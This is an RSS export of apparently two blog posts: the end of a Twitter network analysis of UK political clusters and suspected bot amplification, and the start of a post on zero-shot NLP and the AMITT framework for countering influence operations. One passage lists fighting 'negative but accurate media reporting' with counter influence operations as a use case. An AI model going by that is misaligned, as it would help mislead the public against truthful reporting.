&lt;li&gt;The profile picture of the account (especially the presence of motifs, tropes, regional or national identifiers);&lt;/li&gt;
&lt;li&gt;The profile description of the account (interests, hobbies, political or ideological attachments);&lt;/li&gt;
&lt;li&gt;The number of followers of the account;&lt;/li&gt;
&lt;li&gt;The number of accounts that the account follows;&lt;/li&gt;
&lt;li&gt;The number of tweets sent by the account;&lt;/li&gt;
&lt;li&gt;The retweet:tweet ratio of the account&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The characterisation of each cluster below is interpretive in nature and therefore not only an expression of the data but also the judgements and biases of the analyst (&lt;a href=&quot;https://twitter.com/df_works&quot;&gt;me&lt;/a&gt;). The descriptions do not imply that every node within the community cluster displays the characteristics detailed and there will be significant ‘noise’, particularly at the edges of the clusters, where the node does not behave in the way that the cluster description would suggest.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Manual tweet analysis was conducted by one person in this investigation which increases the likelihood that author bias impacted the community characterisation. If you were looking to reduce the effects of analyst bias on your study then you should consider having multiple analysts review the tweets in isolation. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8bd6ef0af18167465130d239652e7ba8/f8188/labelled.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 55.4054054054054%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAALABQDASIAAhEBAxEB/8QAGAAAAgMAAAAAAAAAAAAAAAAAAAIDBAX/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB2oLiIwov/8QAGBAAAwEBAAAAAAAAAAAAAAAAAQIQEQD/2gAIAQEAAQUCzORy7Qif/8QAFhEAAwAAAAAAAAAAAAAAAAAAEBEh/9oACAEDAQE/AVR//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPwE//8QAGBAAAgMAAAAAAAAAAAAAAAAAABEgIjH/2gAIAQEABj8CZbI//8QAGxAAAwACAwAAAAAAAAAAAAAAAAERECFBUcH/2gAIAQEAAT8hbXVnA+KPAolrCuhKLR//2gAMAwEAAgADAAAAEDv/AP/EABYRAQEBAAAAAAAAAAAAAAAAAAARQf/aAAgBAwEBPxDSo//EABcRAAMBAAAAAAAAAAAAAAAAAAABIRH/2gAIAQIBAT8QjVMP/8QAHBABAQACAgMAAAAAAAAAAAAAAREAIRAxQXGR/9oACAEBAAE/EDRTC6d5Koyw19ZNET3wkNNpZ5wJCGf/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Labelled Chart&quot;
        title=&quot;Labelled Chart&quot;
        src=&quot;/static/8bd6ef0af18167465130d239652e7ba8/1c72d/labelled.jpg&quot;
        srcset=&quot;/static/8bd6ef0af18167465130d239652e7ba8/a80bd/labelled.jpg 148w,
/static/8bd6ef0af18167465130d239652e7ba8/1c91a/labelled.jpg 295w,
/static/8bd6ef0af18167465130d239652e7ba8/1c72d/labelled.jpg 590w,
/static/8bd6ef0af18167465130d239652e7ba8/a8a14/labelled.jpg 885w,
/static/8bd6ef0af18167465130d239652e7ba8/fbd2c/labelled.jpg 1180w,
/static/8bd6ef0af18167465130d239652e7ba8/f8188/labelled.jpg 1494w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Blue Community Cluster&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/eb6a383e762387be6b3f1910a09caae9/22d3c/blue.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 95.94594594594595%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAATABQDASIAAhEBAxEB/8QAGAABAAMBAAAAAAAAAAAAAAAAAAMEBQL/xAAXAQADAQAAAAAAAAAAAAAAAAACAwQA/9oADAMBAAIQAxAAAAHdimzjTE4ZO1XBppCkv//EABkQAAIDAQAAAAAAAAAAAAAAAAEDAAIQEv/aAAgBAQABBQLkRjOYb2JMaNYM/8QAGhEAAgIDAAAAAAAAAAAAAAAAAAECMQMhIv/aAAgBAwEBPwHLJxWjolQqP//EABoRAAICAwAAAAAAAAAAAAAAAAABAgMQETH/2gAIAQIBAT8BgtsdaI9x/8QAFRABAQAAAAAAAAAAAAAAAAAAIBH/2gAIAQEABj8CFP8A/8QAHBAAAwACAwEAAAAAAAAAAAAAAAERMUEQcYGR/9oACAEBAAE/Iez6IWZZZNvwrQ21snCHlDUP/9oADAMBAAIAAwAAABAH4ML/xAAYEQEBAQEBAAAAAAAAAAAAAAABABEhMf/aAAgBAwEBPxCSNm9iN8r/xAAXEQEAAwAAAAAAAAAAAAAAAAABABAR/9oACAECAQE/EByYps//xAAdEAEAAgICAwAAAAAAAAAAAAABABEhMUFRYYGx/9oACAEBAAE/EHZ9JSFLx1HBXjAipQ9wLfaoJIQ4yVaQFQYn/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Blue Chart&quot;
        title=&quot;Blue Chart&quot;
        src=&quot;/static/eb6a383e762387be6b3f1910a09caae9/1c72d/blue.jpg&quot;
        srcset=&quot;/static/eb6a383e762387be6b3f1910a09caae9/a80bd/blue.jpg 148w,
/static/eb6a383e762387be6b3f1910a09caae9/1c91a/blue.jpg 295w,
/static/eb6a383e762387be6b3f1910a09caae9/1c72d/blue.jpg 590w,
/static/eb6a383e762387be6b3f1910a09caae9/22d3c/blue.jpg 654w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The Blue Community Cluster is indistinct from the larger central grouping on the chart, occupying ~35% of it. It is the sparsest of the clusters, with many accounts sitting away from the central grouping demonstrating a broader set of linguistic characteristics than the other clusters. The Blue and Pink Community Clusters share a lot of the same characteristics, namely; pro-Labour tweets, pro-EU tweets, pro-Keir Starmer tweets, anti-Conservative tweets and anti-Boris Johnson tweets. The Blue and Pink clusters differed on the themes that were amplified. Of note, was the amplification of tweets that highlighted Nadie Dorries’ &lt;a href=&quot;https://www.thenational.scot/news/20110252.nadine-dorries-spreading-disinformation-keir-starmer-beergate-row-snp-mp-says/&quot;&gt;propagation of disinformaton&lt;/a&gt; concerning Keir Starmer and the lack of coverage, particularly by the BBC, regarding the raid of &lt;a href=&quot;https://www.theguardian.com/uk-news/2022/apr/29/nca-launches-investigation-ppe-firm-linked-to-michelle-mone&quot;&gt;Michelle Mone’s residence&lt;/a&gt;. Given the high volume of retweets in this cluster (97%) it is almost certain that this cluster has coalesced due to prominent tweets that were shared across many of the accounts. It is also probable that there was significant ‘bot’ activity occurring given the lack of original content and relatively low average following of accounts in this cluster.&lt;/p&gt;
&lt;h2&gt;Pink Community Cluster&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/17764e10de527cdc95b66dfd18bb0fe4/b4294/pink.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 95.94594594594595%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAATABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAEEAgP/xAAWAQEBAQAAAAAAAAAAAAAAAAAAAQP/2gAMAwEAAhADEAAAAfe67rNDplbAoP/EABoQAAICAwAAAAAAAAAAAAAAAAECABADETL/2gAIAQEAAQUCpeTiiKAa1X//xAAWEQEBAQAAAAAAAAAAAAAAAAACASD/2gAIAQMBAT8BBhmP/8QAFhEBAQEAAAAAAAAAAAAAAAAAARIg/9oACAECAQE/AWXH/8QAFxABAAMAAAAAAAAAAAAAAAAAEAEgIf/aAAgBAQAGPwIg2v8A/8QAGxABAQEAAgMAAAAAAAAAAAAAAQARECExQVH/2gAIAQEAAT8hCyOBY+G7ThPTxheyw+X/2gAMAwEAAgADAAAAEGTPAP/EABQRAQAAAAAAAAAAAAAAAAAAACD/2gAIAQMBAT8QCf/EABURAQEAAAAAAAAAAAAAAAAAABEg/9oACAECAQE/ECMf/8QAHBABAAICAwEAAAAAAAAAAAAAAQARIWEQMUGB/9oACAEBAAE/EPdhdALYpnhFDm1LwAmQWoowJp4ygLsgXQPk/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pink Chart&quot;
        title=&quot;Pink Chart&quot;
        src=&quot;/static/17764e10de527cdc95b66dfd18bb0fe4/1c72d/pink.jpg&quot;
        srcset=&quot;/static/17764e10de527cdc95b66dfd18bb0fe4/a80bd/pink.jpg 148w,
/static/17764e10de527cdc95b66dfd18bb0fe4/1c91a/pink.jpg 295w,
/static/17764e10de527cdc95b66dfd18bb0fe4/1c72d/pink.jpg 590w,
/static/17764e10de527cdc95b66dfd18bb0fe4/b4294/pink.jpg 600w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The Pink Community Cluster is indistinct from the larger central grouping on the chart, occupying ~33% of it. It has fewer outliers than the Blue cluster but is not as densely concentrated as the Green cluster. As mentioned, the Blue and Pink Community Clusters share many of the same characteristics, however, the Pink cluster had a greater volume of tweets that were specifically anti-Boris Johnson. In addition, the tweets analysed in this cluster discussed ongoing local elections (as of May 2022) and Boris Johnson’s unsuitability for the role of Prime Minister and as leader of the Conservative Party. Given the high volume of retweets in this cluster (98%) it is almost certain that this cluster has coalesced due to prominent tweets that were shared across many of the accounts. It is also probable that there was significant ‘bot’ activity occurring given the lack of original content and relatively low average following of accounts in this cluster.&lt;/p&gt;
&lt;h2&gt;Green Community Cluster&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/1b9354d804d4799ce69e2d777231cc7e/9453e/green.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 57.432432432432435%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAALABQDASIAAhEBAxEB/8QAGQAAAgMBAAAAAAAAAAAAAAAAAAECAwQF/8QAFAEBAAAAAAAAAAAAAAAAAAAAA//aAAwDAQACEAMQAAAB1uiQD1xjt//EABsQAAIBBQAAAAAAAAAAAAAAAAECAAMQERIx/9oACAEBAAEFAjVYxHO2LDs//8QAFhEBAQEAAAAAAAAAAAAAAAAAAQIQ/9oACAEDAQE/AYVz/8QAFhEBAQEAAAAAAAAAAAAAAAAAAQIQ/9oACAECAQE/AaErP//EABcQAAMBAAAAAAAAAAAAAAAAAAABESD/2gAIAQEABj8CFc//xAAaEAEAAwADAAAAAAAAAAAAAAABABExECFx/9oACAEBAAE/IWOmiKsqZAHGHsMn/9oADAMBAAIAAwAAABDMD//EABURAQEAAAAAAAAAAAAAAAAAAAEQ/9oACAEDAQE/EABWf//EABYRAQEBAAAAAAAAAAAAAAAAAAEQEf/aAAgBAgEBPxBljP/EABsQAAMAAgMAAAAAAAAAAAAAAAABIRFBMVGR/9oACAEBAAE/EG13oloTT3VFOFn02Rh6HAf/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Green Chart&quot;
        title=&quot;Green Chart&quot;
        src=&quot;/static/1b9354d804d4799ce69e2d777231cc7e/1c72d/green.jpg&quot;
        srcset=&quot;/static/1b9354d804d4799ce69e2d777231cc7e/a80bd/green.jpg 148w,
/static/1b9354d804d4799ce69e2d777231cc7e/1c91a/green.jpg 295w,
/static/1b9354d804d4799ce69e2d777231cc7e/1c72d/green.jpg 590w,
/static/1b9354d804d4799ce69e2d777231cc7e/9453e/green.jpg 614w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The Green Community Cluster is indistinct from the larger central grouping on the chart, occupying ~30% of it. It is the densest cluster with the fewest outliers suggesting that their is less variation from a linguistics perspective. Despite this, the Green Community Cluster was the only cluster where pro-Boris Johnson tweets (#BackBoris) and tweets supporting the Scottish National Party (and Scottish Independence) were observed alongside accounts with more traditionally liberal standpoints. The volume of retweets in this cluster (88%) is high but is notably different from the other clusters when considering the volume of original content. It is probable that there was significant ‘bot’ activity in this cluster although, given the relatively high median average of followers, it is a possible indication that there were fewer bots (or possibly a more mature approach to automated amplification).&lt;/p&gt;
&lt;h2&gt;Observations of Amplified Content&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;An activity common across many of the accounts that were appraised was the very high quantities of retweets and few original messages. Because of this it is highly likely that prominent retweets would have had a strong effect on how the accounts were clustered compared to a situation with a greater selection of original content. &lt;/li&gt;
&lt;li&gt;The author of one of the top 10 most amplified tweets was also present in the network. Alastair Campbell’s (&lt;a href=&quot;https://twitter.com/campbellclaret&quot;&gt;@campbellclaret&lt;/a&gt;) account was placed in the Blue cluster and his most prominent &lt;a href=&quot;https://twitter.com/campbellclaret/status/1516372348953415684&quot;&gt;tweet&lt;/a&gt; across this time period was on the 19th April and shared over 7000 times.&lt;/li&gt;
&lt;li&gt;In the Pink cluster, 3 of the top 10 most retweeted posts were authored by &lt;a href=&quot;https://twitter.com/Keir_Starmer&quot;&gt;Keir Starmer&lt;/a&gt;. Whilst not indicative, it is possible, given the relatively high percentage of retweets in this cluster that there was an orchestrated attempt at amplification using bots by supporters of the Labour leader. Further analysis of the accounts in the Pink cluster would need to be conducted to test this hypothesis. This analysis would likely include a temporal study to identify retweeting patterns and a dataset that extends beyond the most recent 200 tweets.&lt;/li&gt;
&lt;li&gt;Interestingly, the average age of the accounts across all the clusters was longer than two years which suggests a fairly mature approach to automated activity, assuming automated activity was prevalent. To achieve this, either aged accounts have been purchased or this is a network of accounts that has operated for many years.&lt;/li&gt;
&lt;li&gt;By volume, there were far more tweets suggesting that partygate was still a prominent issue and one that reflected poorly on Boris Johnson, his Government and the Conservative Party. Even in the Green Community Cluster, which contained accounts in favour of Boris Johnson, there was a large quantity of anti-Government tweets.&lt;/li&gt;
&lt;li&gt;Given the lack of original content and the probability of inauthentic and automated ‘bot’ activity, it is difficult to judge whether this is reflective of the UK population as a whole. An unintended output of the analysis may have been the identification of different automated influence campaigns. It is possible that the Pink cluster identified a network of bots promoting Keir Starmer content and highlighting Boris Johnson’s shortcomings with a view to influence Local Elections this week. The Blue cluster may have been a campaign with broader aims to undermine the Conservative Party. As above, analysis of temporal patterns and a separate dataset would be need to test these hypotheses.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Automatic detection of ‘bot’ activity is actually &lt;a href=&quot;https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3814191&quot;&gt;quite difficult&lt;/a&gt;. Even some published, scientific papers studying automated activity and disinformation have struggled identifying valuable heuristics to discriminate between human and non-human activity. One of the most common automatic bot detection tools, &lt;a href=&quot;https://botometer.osome.iu.edu/&quot;&gt;Botometer&lt;/a&gt;, has been &lt;a href=&quot;https://blog.plan99.net/fake-science-part-ii-bots-that-are-not-c66129e5e3f5&quot;&gt;increasingly criticised&lt;/a&gt; over the accuracy of its results.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Interpretation&lt;/h2&gt;
&lt;p&gt;The research of suspicious activity online, including suspected influence campaigns, frequently confronts a common problem: any number of different underlying motivations can manifest as the same behaviour. Inauthentic activity, organic engagement, automated activity and commercial motivations all mix together to drive online behaviour. Definitively distinguishing between all of these different forms of activity is extremely challenging. The nature of the activity often relies on the underlying intent and motivation of the actors involved and so is beyond the ability of research such as this, which is aimed at describing behaviours on an online platform.&lt;/p&gt;
&lt;h2&gt;Limitations and Caveats&lt;/h2&gt;
&lt;p&gt;As with any methodology, the approach used here carries with it a series of strengths and weaknesses. When interpreting the data, the following caveats should be regarded;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The cluster descriptions are impressionistic. Other researchers may have drawn different contrasts or similarities from an appraisal of accounts in this network, or may have placed emphasis elsewhere.&lt;/li&gt;
&lt;li&gt;The cluster descriptions do not hold true for every account that is a member of them.&lt;/li&gt;
&lt;li&gt;Manual analysis, while the best method for developing holistic impressions, does limit the number of accounts that can be used to characterise clusters.&lt;/li&gt;
&lt;li&gt;Each cluster will contain ‘noise’ of different sorts; including accounts that are from different countries, use different languages and do not behave in the way that the overall descriptions of each cluster would suggest.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Zero-shot learning and the AMITT framework]]></title><description><![CDATA[Problem Statement Can organisations or individuals without nationstate resources assimilate information quickly enough to orchestrate an…]]></description><link>https://dfworks.com/blog/zero_shot_amitt/</link><guid isPermaLink="false">https://dfworks.com/blog/zero_shot_amitt/</guid><pubDate>Wed, 12 May 2021 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Problem Statement&lt;/h2&gt;
&lt;p&gt;Can organisations or individuals without nationstate resources assimilate information quickly enough to orchestrate an effective response to combative influence operations?&lt;/p&gt;
&lt;h2&gt;Online Influence Operations&lt;/h2&gt;
&lt;p&gt;Influence operations includes the collection of information about an adversary as well as the dissemination of propaganda in pursuit of a competitive advantage over an opponent. State actors exploiting the openness and reach of the internet to conduct influence operations in pursuit of strategic objectives has been well documented and studied in academia. The history of online influence operations is brief, relative to the history of more traditional forms of propaganda, but malicious, anonymous and opposing online actors have used computational propaganda techniques to spread disinformation, censor and attack journalists and create fake trends.&lt;/p&gt;
&lt;p&gt;In the last decade, clear-cut cases of influence operations have been observed in;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://abcnews.go.com/ABC_Univision/ABC_Univision/2012s-biggest-social-media-blunders-latin-american-politics/story?id=18063022&quot;&gt;Argentina&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://independentaustralia.net/politics/politics-display/the-coalitions-twitter-fraud-and-deception,5660&quot;&gt;Australia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.katypearce.net/cyberfuckery-in-azerbaijan/&quot;&gt;Azerbaijan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://marcowenjones.wordpress.com/2016/07/12/are-twitter-bots-on-yemen-and-bahrain-hashtags-linked-to-news-broadcaster-saudi-24/&quot;&gt;Bahrain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.researchgate.net/publication/317335919_Tropical_Bot_Wars&quot;&gt;Brazil&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://gking.harvard.edu/publications/how-censorship-china-allows-government-criticism-silences-collective-expression&quot;&gt;China&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.bbc.co.uk/news/blogs-trending-35778645&quot;&gt;Iran&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://arxiv.org/abs/1509.04098&quot;&gt;Italy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dl.acm.org/doi/10.1145/2818048.2819985&quot;&gt;Mexico&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.jstor.org/stable/26532695&quot;&gt;Russia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.nytimes.com/2013/11/22/world/asia/prosecutors-detail-bid-to-sway-south-korean-election.html&quot;&gt;South Korea&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.refworld.org/docid/52663ada8.html&quot;&gt;Saudi Arabia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.academia.edu/8281464/The_AK_Party_s_social_media_strategy_controlling_the_uncontrollable&quot;&gt;Turkey&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://arxiv.org/ftp/arxiv/papers/1606/1606.06356.pdf&quot;&gt;The UK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.researchgate.net/publication/280538627_Political_Bots_and_the_Manipulation_of_Public_Opinion_in_Venezuela&quot;&gt;Venezuela&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Often, in order to fully understand the complexity and motives of an online influence operation, an organisation requires both specific domain expertise and a lot of data. This is achievable if studied retrospectively but there are significant issues in being able to assimilate information quickly enough to orchestrate a response when you are the target of an active and aggressive influence operation. These issues are more acute for an organisation suffering from faster moving smear campaigns or localised influence operations where nationstate resources and friendly media outlets are unavailable. Situations which may call for an imperfect but faster response would include;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Trial by media&lt;/strong&gt; - A requirement to impact television and newspaper coverage regarding an individual or organisation’s reputation by seizing a narrative and influencing perceptions of guilt or innocence before a verdict.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Defamation/Libel&lt;/strong&gt; - If you are an organisation that is suffering reputational damage as a result of damaging articles or statements then the virality at which the offending content is shared often outstrips the speed of legal proceedings to have the content removed. &lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Negative Exposure&lt;/strong&gt; - Negative but accurate media reporting can be combated with counter influence operations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shareholder activism&lt;/strong&gt; - Hedge fund activism designed to assert pressure and leverage boards into making favourable decisions is often supplemented with PR and media activity to seize a narrative and sway neutral voters.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An organisation that is not typically equipped for handling aggressive influence operations would therefore need to quickly understand the actors involved, the information disseminated and have a framework for forming a response. &lt;/p&gt;
&lt;h2&gt;Quickly assimilating information&lt;/h2&gt;
&lt;p&gt;Zero-Shot Learning (ZSL) is a machine learning method that can detect classes that a model hasn’t observed during training. It resembles our ability as humans to generalize and identify new things without explicit supervision. While ZSL models are unlikely to achieve the accuracy or utility of a model trained specifically for a task they are a suitable tool for this problem set. Hand-labeled training sets are expensive, time consuming to assemble and often require domain expertise - all of which are not conducive to responding quickly during a crisis.&lt;/p&gt;
&lt;p&gt;Until fairly recently, (Natural Language Processing) NLP models were limited to classifying text with a predefined number of candidate categories. These categories had to be set in advance during training. The addition of new categories would require you to re-train your model with more examples. There are excellent open-source NLP models out there, based on Hugging Face Transformers, that work well for zero-shot text classification which I have utilised in this project;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/AnjanaRita/zeroshot_topics&quot;&gt;zeroshot_topics&lt;/a&gt; is distributed on PyPI as a universal wheel and harnesses &lt;a href=&quot;https://github.com/MaartenGr/KeyBERT&quot;&gt;KeyBERT&lt;/a&gt; which is an easy-to-use keyword extraction technique that leverages BERT embeddings to create keywords and phrases that are most similar within a document. The ambition for utilising this library was to identify themes or clusters of articles/posts deployed in an influence operation.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://pypi.org/project/zero-shot-re/&quot;&gt;zero_shot_re&lt;/a&gt; is a zero-shot relation extractor project based on the paper ‘Exploring the zero-shot limit of FewRel’ by &lt;a href=&quot;https://paperswithcode.com/paper/exploring-the-zero-shot-limit-of-fewrel&quot;&gt;Alberto Cetoli&lt;/a&gt;. Being able to agnostically generate knowledge graphs from text will help determine threat actors and themes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can follow along with the &lt;a href=&quot;https://github.com/dfaram7/zeroshot_amitt/blob/main/zero_shot_amitt.ipynb&quot;&gt;notebook&lt;/a&gt; on github.&lt;/p&gt;
&lt;h2&gt;A framework for responding to online influence operations&lt;/h2&gt;
&lt;p&gt;The Adversarial Misinformation and Influence Tactics and Technique &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT&quot;&gt;AMITT&lt;/a&gt; Framework was created from a need for a common language for disinformation. The structure and propagation patterns of misinformation attacks have many similarities to those seen in information security and computer hacking so the framework adopts a similar structure to that of the &lt;a href=&quot;https://attack.mitre.org/&quot;&gt;MITRE&lt;/a&gt; ATT&amp;#x26;CK framework which has been heavily adopted in the cyber security industry.&lt;/p&gt;
&lt;p&gt;AMITT is a set of data standards and an open source knowledge base of both red and blue team disinformation tactics and techniques. AMITT’s intended users are disinformation responders; its purpose is to give them the ability to tactically respond to influence operations, plan defences and to transfer information security principles to the disinformation sphere. The framework consists of blue team (defence) and red team (attack) models as well as a repository of examples, descriptions and mitigations.&lt;/p&gt;
&lt;h2&gt;Project&lt;/h2&gt;
&lt;p&gt;We have used Neo4j, a graph database that features the labeled property graph model, to present the information we are extracting from each article. The articles scraped will have a sentiment, a theme/topic that has been classified by ZSL and a series of entities that have been extracted. &lt;/p&gt;
&lt;p&gt;Relations between entities are stored as intermediate nodes instead of direct links in order to more easily display sentiment as well as providing an audit trail of the source text from which the relation was extracted. With the labeled property graph model, you can’t have a relationship pointing to another relationship. For this reason, we refactor the connection between extracted entities into an intermediate node. Feel free to try topics and search terms of your own.&lt;/p&gt;
&lt;h2&gt;Overlaying AMITT framework and further work&lt;/h2&gt;
&lt;p&gt;There will still be elements of manual analysis required to understand the context of a given influence operation but the graph data, as an example, could be used to help determine the following more quickly;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Discovery of frequently discussed topics can help to determine opponent &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/tactics/TA01.md&quot;&gt;strategic objectives&lt;/a&gt; (dismiss, distort, distract, dismay, divide) as well as existing and competing narratives.&lt;/li&gt;
&lt;li&gt;The entire network analysis can help inform a &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/techniques/T0005.md&quot;&gt;centre of gravity&lt;/a&gt; study where key communities, influencers and media outlets can be identified.&lt;/li&gt;
&lt;li&gt;Replacing media articles with tweets or other social media posts and incorporating bot or “fake news” detection will help build a picture of where and how computational propaganda is being used.&lt;/li&gt;
